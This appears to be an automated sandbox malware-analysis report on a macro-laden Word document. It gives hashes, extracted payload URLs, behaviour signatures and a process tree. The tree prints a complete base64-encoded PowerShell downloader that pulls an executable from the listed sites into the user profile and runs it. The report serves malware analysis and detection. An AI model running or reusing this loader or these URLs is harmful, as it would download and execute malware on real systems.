Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
19-07-2024 20:05
Behavioral task
behavioral1
Sample
5d796b4f80a7c7626db81ad6a55d3018_JaffaCakes118.doc
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
5d796b4f80a7c7626db81ad6a55d3018_JaffaCakes118.doc
Resource
win10v2004-20240704-en
General
-
Target
5d796b4f80a7c7626db81ad6a55d3018_JaffaCakes118.doc
-
Size
241KB
-
MD5
5d796b4f80a7c7626db81ad6a55d3018
-
SHA1
976086afeee4e35ebec99e1b3a7176c9d16a08dc
-
SHA256
107fd6be86b92cd124d49b967f2d1d719305db9f215eb21fcc0c5c65a7dc1e14
-
SHA512
671d3921f67c1348b01beab6af5a5619ff6890f6805bfa96ace2f02d5bf22108a1aebb7b6eb3c5d2dde12be72118ff4ecd69daf2a00500824cc727a57b95d97e
-
SSDEEP
6144:Y77HUUUUUUUUUUUUUUUUUUUT52Vxygud92G1EBoBlf:Y77HUUUUUUUUUUUUUUUUUUUTCs/yeBlf
Malware Config
Extracted
http://dorubi.com/lnoubt/fx/
http://demo-progenajans.com/icceturkey/V81jki/
http://autofashionfactory.com/HLIC/epReQJ/
http://bedfont.com/selectbox/Q97C/
http://bernielandry.com/wp-includes/J3h/
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 7 1988 powershell.exe 9 1988 powershell.exe 11 1988 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2464 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1988 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2464 WINWORD.EXE 2464 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 2464 wrote to memory of 2092 2464 WINWORD.EXE splwow64.exe PID 2464 wrote to memory of 2092 2464 WINWORD.EXE splwow64.exe PID 2464 wrote to memory of 2092 2464 WINWORD.EXE splwow64.exe PID 2464 wrote to memory of 2092 2464 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d796b4f80a7c7626db81ad6a55d3018_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -enc JABqAGsAUQBDAHgAMQA9ACgAJwB6AEEAJwArACcARABYAEEAeAAnACsAJwBrACcAKQA7ACQARwBBAEEAUQBBAFEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBYAEEAMQBBAGsANABjAD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAZABvAHIAJwArACcAdQBiAGkALgBjAG8AbQAvAGwAbgBvAHUAJwArACcAYgB0AC8AJwArACcAZgB4AC8AQABoACcAKwAnAHQAdABwADoALwAvAGQAZQBtAG8ALQBwAHIAbwAnACsAJwBnAGUAbgBhAGoAJwArACcAYQBuAHMALgBjAG8AbQAvAGkAYwBjACcAKwAnAGUAdAAnACsAJwB1AHIAawAnACsAJwBlACcAKwAnAHkALwBWADgAMQBqAGsAaQAvAEAAaAB0AHQAJwArACcAcAA6AC8ALwBhAHUAdAAnACsAJwBvAGYAYQBzACcAKwAnAGgAaQBvAG4AZgBhACcAKwAnAGMAdABvAHIAeQAuAGMAbwBtACcAKwAnAC8ASABMAEkAQwAvAGUAJwArACcAcABSAGUAUQBKAC8AQABoAHQAdABwADoALwAvAGIAZQBkAGYAJwArACcAbwAnACsAJwBuAHQALgBjAG8AbQAnACsAJwAvAHMAZQBsACcAKwAnAGUAYwAnACsAJwB0AGIAJwArACcAbwB4AC8AUQA5ADcAQwAvAEAAaAB0AHQAcAA6AC8ALwAnACsAJwBiAGUAJwArACcAcgBuAGkAZQBsAGEAbgBkAHIAeQAuAGMAbwBtAC8AdwBwAC0AaQBuACcAKwAnAGMAbAAnACsAJwB1AGQAZQBzAC8AJwArACcASgAzAGgAJwArACcALwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABjADEAUQBCAG8AQQA9ACgAJwBQAFEAQQAnACsAJwBVACcAKwAnAEEAQQBBADEAJwApADsAJAB3AEEAQQBEAEMAVQAgAD0AIAAoACcAMQAnACsAJwA4ADkAJwApADsAJABJAEIAUQBBAEMAQQA9ACgAJwBqACcAKwAnAFEARwBBAFUAUQAnACkAOwAkAHAAQgBBAFUAQQBfAF8AVQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBBAEEARABDAFUAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAEcARABjAFgAQQB3AEEAIABpAG4AIAAkAEcAWABBADEAQQBrADQAYwApAHsAdAByAHkAewAkAEcAQQBBAFEAQQBRAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFgARwBEAGMAWABBAHcAQQAsACAAJABwAEIAQQBVAEEAXwBfAFUAKQA7ACQARgBBAEEAQQBaAG8AQwA9ACgAJwBwAGsARwBrACcAKwAnAEEAJwArACcAbwBrACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAHAAQgBBAFUAQQBfAF8AVQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHAAQgBBAFUAQQBfAF8AVQA7ACQAUQB3AHgAQQBCAEMARABBAD0AKAAnAGoAbwBBADQAJwArACcAQQAnACsAJwBBACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGsAUQAxAEEAQQBrAEEAPQAoACcATABEACcAKwAnAEEAQgAnACsAJwBCAEIAXwBBACcAKQA7AA==1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD51ad2440a9372685ad67be94804f48059
SHA1f5a795675823a99372e680f567a736363ffe7976
SHA25680e3fc8fa161f584fe27ba6cf808870fddc87e27a4a4353e955749fa25e059df
SHA512a9172ce8dfef7eb8a31b16e235e3b4bed9310c660ee91067f8a06d843a6f89db0aa9976d8db3fc439d5a28fc281e4919b495bda1d9ae2833085a5a37a33a60f0